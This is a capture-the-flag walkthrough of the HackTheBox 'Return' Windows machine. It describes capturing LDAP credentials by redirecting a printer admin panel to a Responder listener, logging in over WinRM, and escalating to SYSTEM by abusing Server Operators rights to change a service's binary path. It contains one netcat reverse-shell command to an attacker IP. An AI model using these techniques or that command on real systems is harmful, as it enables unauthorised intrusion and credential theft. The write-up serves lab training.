HackTheBox : Return Walkthrough
Operating System : Windows
Difficulty : Easy
First, let start reconnaissance all open ports on all the target system with nmap scan.
Next, use the Nmap tool to scan the details of the services and versions on all open ports. You will find that the LDAP service points to the domain: return.local.
Add the target machine’s IP address (10.10.11.108) and domain (return.local) to the /etc/hosts file
Next, navigate to the website http://return.local, where you will find the HTB Printer Admin Panel.
Next, explore the various functions and find a ‘Settings’ page (http://return.local/settings.php) for logging into the system. On this page, you will discover a connection to the server address printer.return.local on port 389, which is an LDAP service, with the username (svc-printer) and password (blind) stored within the website.
Next, view the source code to find the stored password, but you will discover that it is unreadable due to protection measures.
Next, use BurpSuite to intercept the request sent from the settings page to the server. You’ll find that the body of the request contains only the server address. This allows an attacker to modify the server address to connect to their own machine, potentially capturing the username and password used to authenticate with the LDAP service.
Use the Responder tool to listen for incoming traffic, configuring it to operate on the tun0 interface.
In the settings panel, change the server address to connect to the attacker’s server (in this example, 10.10.14.12), then click ‘Update’.
On the attacker’s Responder, you will see that the LDAP service credentials have been successfully captured.
Next, use the netexec tool to test access to the target machine using the credentials of the svc-printer user via WinRM. You will find that the connection is successful, granting full access to the target machine (Pwn3d!).
Next, use the Evil-WinRM tool along with the credentials (username and password) of the svc-printer user to connect to the target machine, and you will find that the connection is successful.
Read the user flag from the user.txt file.
Next, examine the permissions of the svc-printer user and find that they belong to the ‘Server Operators’ group. This means they have the authority to set the location of binary files used to start various services and can start or stop services on the server.
Members of the Server Operators group can sign in to a server interactively, create and delete network shared resources, start and stop services, back up and restore files, format the hard disk drive of the computer, and shut down the computer.
Next, review the services running on the target machine, focusing on those that start with LocalSystem privileges. In this lab, the service ‘VGAuthService’ will be selected.
Upload nc64.exe to the target machine.
Next, set the service’s binary start path (binpath) to execute cmd.exe and run nc64.exe, instructing it to connect to IP 10.10.14.12 on port 4444. Once the connection is successful, Netcat will launch cmd.exe (Command Prompt).
C:\windows\system32\cmd.exe /c C:\Users\svc-printer\Desktop\nc64.exe -e cmd <attacker ip> 4444
Next, verify the binary path file settings to confirm that it points to the desired location successfully, and then start the service with LocalSystem privileges.
Next, on the attacker’s machine, use the nc command to create a listener to await the connection from the target machine on port 4444.
Next, stop the VGAuthService service.
Check the status of the VGAuthService again to ensure that it has stopped running.
Next, start the VGAuthService service to initiate its execution, following the binary path that was set.
On the attacker’s machine, a reverse shell connection from the target machine is successfully established with nt authority\system privileges, the highest level of access on the Windows operating system.
Read the root flag from the root.txt file.
